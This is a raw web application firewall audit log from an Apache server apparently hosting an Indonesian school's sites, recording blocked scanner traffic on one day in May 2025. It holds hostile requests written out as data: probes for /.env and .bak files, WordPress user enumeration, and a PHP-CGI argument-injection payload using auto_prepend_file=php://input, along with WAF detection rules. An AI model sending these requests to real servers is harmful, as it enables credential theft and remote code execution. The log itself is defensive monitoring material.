Content-Type: text/html; charset=iso-8859-1 --0d360638-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883852336 1646 (- - -) Stopwatch2: 1747543883852336 1646; combined=710, p1=388, p2=295, p3=0, p4=0, p5=27, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d360638-Z-- --c071f82e-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cTCQAAAI0 103.236.140.4 58354 103.236.140.4 8181 --c071f82e-B-- GET /web.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224852 --c071f82e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c071f82e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883852896 2273 (- - -) Stopwatch2: 1747543883852896 2273; combined=710, p1=312, p2=366, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c071f82e-Z-- --a4c3f875-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cTCwAAAJQ 103.236.140.4 58354 103.236.140.4 8181 --a4c3f875-B-- GET /smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 123177323 --a4c3f875-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a4c3f875-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883878010 1650 (- - -) Stopwatch2: 1747543883878010 1650; combined=672, p1=331, p2=315, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4c3f875-Z-- --16e83e63-A-- [18/May/2025:11:58:16 +0700] aClo6Bir-GlPrFVVKe5FlAAAAEw 103.236.140.4 33482 103.236.140.4 8181 --16e83e63-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 142.93.129.190 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 142.93.129.190 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --16e83e63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16e83e63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747544296911539 766 (- - -) Stopwatch2: 1747544296911539 766; combined=318, p1=277, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16e83e63-Z-- --e7bdae12-A-- [18/May/2025:12:05:33 +0700] aClqnfypzAd0elWOk7o-jgAAAAk 103.236.140.4 38038 103.236.140.4 8181 --e7bdae12-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.99.181.249 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.99.181.249 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --e7bdae12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7bdae12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747544733705100 698 (- - -) Stopwatch2: 1747544733705100 698; combined=313, p1=285, p2=0, p3=0, p4=0, p5=28, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7bdae12-Z-- --05521f1d-A-- [18/May/2025:12:13:20 +0700] aClscEPRqak7bVuUS6cWdgAAAIs 103.236.140.4 42908 103.236.140.4 8181 --05521f1d-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 207.154.212.47 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --05521f1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05521f1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747545200574814 850 (- - -) Stopwatch2: 1747545200574814 850; combined=368, p1=328, p2=0, p3=0, p4=0, p5=40, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05521f1d-Z-- --b6bfad37-A-- [18/May/2025:12:14:55 +0700] aClszxir-GlPrFVVKe5IAQAAAFI 103.236.140.4 43898 103.236.140.4 8181 --b6bfad37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.46.219.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.46.219.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b6bfad37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6bfad37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747545295140780 2649 (- - -) Stopwatch2: 1747545295140780 2649; combined=1300, p1=428, p2=843, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6bfad37-Z-- --f9ac6100-A-- [18/May/2025:12:46:50 +0700] aCl0SkPRqak7bVuUS6cd7wAAAJU 103.236.140.4 38120 103.236.140.4 8181 --f9ac6100-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 146.190.63.48 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 146.190.63.48 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f9ac6100-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9ac6100-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747547210720311 845 (- - -) Stopwatch2: 1747547210720311 845; combined=310, p1=271, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9ac6100-Z-- --e43c044e-A-- [18/May/2025:13:02:35 +0700] aCl3-xir-GlPrFVVKe5PbgAAAEM 103.236.140.4 45192 103.236.140.4 8181 --e43c044e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; i1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --e43c044e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e43c044e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747548155004978 971 (- - -) Stopwatch2: 1747548155004978 971; combined=368, p1=326, p2=0, p3=0, p4=0, p5=42, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e43c044e-Z-- --8b0e9354-A-- [18/May/2025:13:07:50 +0700] aCl5NkPRqak7bVuUS6cgdwAAAJg 103.236.140.4 45222 103.236.140.4 8181 --8b0e9354-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.3.141 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.3.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8b0e9354-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b0e9354-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747548470600448 846 (- - -) Stopwatch2: 1747548470600448 846; combined=343, p1=299, p2=0, p3=0, p4=0, p5=43, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b0e9354-Z-- --bc687e27-A-- [18/May/2025:14:14:43 +0700] aCmI4xir-GlPrFVVKe5QbgAAAE8 103.236.140.4 47108 103.236.140.4 8181 --bc687e27-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 54.78.115.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bc687e27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc687e27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747552483947180 2860 (- - -) Stopwatch2: 1747552483947180 2860; combined=1269, p1=416, p2=819, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc687e27-Z-- --94065421-A-- [18/May/2025:14:17:12 +0700] aCmJeBir-GlPrFVVKe5QygAAAEM 103.236.140.4 47922 103.236.140.4 8181 --94065421-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --94065421-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94065421-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747552632629074 772 (- - -) Stopwatch2: 1747552632629074 772; combined=328, p1=291, p2=0, p3=0, p4=0, p5=36, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94065421-Z-- --ed7beb57-A-- [18/May/2025:14:17:14 +0700] aCmJehir-GlPrFVVKe5QzwAAAEs 103.236.140.4 47936 103.236.140.4 8181 --ed7beb57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ed7beb57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed7beb57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747552634852168 715 (- - -) Stopwatch2: 1747552634852168 715; combined=305, p1=268, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed7beb57-Z-- --d10b3605-A-- [18/May/2025:14:29:49 +0700] aCmMbfypzAd0elWOk7pI6gAAABc 103.236.140.4 49142 103.236.140.4 8181 --d10b3605-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --d10b3605-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d10b3605-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747553389162954 886 (- - -) Stopwatch2: 1747553389162954 886; combined=339, p1=299, p2=0, p3=0, p4=0, p5=40, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d10b3605-Z-- --49947958-A-- [18/May/2025:14:46:57 +0700] aCmQcUPRqak7bVuUS6ci4gAAAIA 103.236.140.4 49270 103.236.140.4 8181 --49947958-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 182.106.203.75 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 182.106.203.75 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --49947958-C-- --49947958-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49947958-E-- --49947958-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747554417031984 5159 (- - -) Stopwatch2: 1747554417031984 5159; combined=3350, p1=571, p2=2744, p3=0, p4=0, p5=35, sr=102, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49947958-Z-- --f9bf2e08-A-- [18/May/2025:15:09:35 +0700] aCmVv0PRqak7bVuUS6ckBgAAAIA 103.236.140.4 49926 103.236.140.4 8181 --f9bf2e08-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.46.219.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.46.219.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f9bf2e08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9bf2e08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747555775944623 2464 (- - -) Stopwatch2: 1747555775944623 2464; combined=1200, p1=384, p2=775, p3=0, p4=0, p5=41, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9bf2e08-Z-- --3c52a926-A-- [18/May/2025:18:06:13 +0700] aCm_JUPRqak7bVuUS6dBBQAAAIQ 103.236.140.4 45138 103.236.140.4 8181 --3c52a926-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3c52a926-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c52a926-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747566373609041 3611 (- - -) Stopwatch2: 1747566373609041 3611; combined=1960, p1=634, p2=1294, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c52a926-Z-- --5a0bcc76-A-- [18/May/2025:18:06:22 +0700] aCm_LlewLfDrCkDGIGyCcgAAAMQ 103.236.140.4 45318 103.236.140.4 8181 --5a0bcc76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.72 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5a0bcc76-C-- demo.sayHello --5a0bcc76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a0bcc76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747566382955088 4775 (- - -) Stopwatch2: 1747566382955088 4775; combined=3752, p1=568, p2=2980, p3=33, p4=36, p5=81, sr=64, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a0bcc76-Z-- --c2cb6b19-A-- [18/May/2025:18:11:33 +0700] aCnAZRir-GlPrFVVKe5rRAAAAE8 103.236.140.4 50246 103.236.140.4 8181 --c2cb6b19-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 209.38.208.202 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 209.38.208.202 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c2cb6b19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2cb6b19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747566693903959 884 (- - -) Stopwatch2: 1747566693903959 884; combined=358, p1=301, p2=0, p3=0, p4=0, p5=56, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips 